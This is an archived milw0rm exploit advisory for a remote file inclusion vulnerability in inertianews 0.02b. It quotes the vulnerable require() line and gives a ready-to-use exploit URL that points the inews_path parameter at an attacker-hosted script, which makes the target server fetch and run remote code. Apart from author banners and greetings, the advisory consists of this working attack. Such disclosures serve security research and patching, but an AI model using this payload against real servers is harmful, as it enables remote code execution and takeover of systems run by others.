23 lines
No EOL
961 B
Text
23 lines
No EOL
961 B
Text
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
+ +
|
|
+ inertianews 0.02b Remote File Include Vulnerability +
|
|
+ +
|
|
+ Found3R: bd0rk || SOH-Crew +
|
|
+ +
|
|
+ eMail: bd0rk[at]hackermail.com +
|
|
+ +
|
|
+ Greetz: str0ke, TheJT, Axel H., Carsten S. +
|
|
+ +
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Download: http://www.brentc.com/inertianews/download/inertianews02b.zip
|
|
|
|
=> Vulnerable Code in inertianews_main.php <=
|
|
|
|
Code: require ("$inews_path/inertia_sql_class.php");
|
|
|
|
[+]Exploit: http://[host]/[inertia_dir]/inertianews_main.php?inews_path=http://[TroubleScript]
|
|
|
|
Special-Greetz: ajann, Kacper, Google-Team :-)
|
|
|
|
# milw0rm.com [2006-12-21] |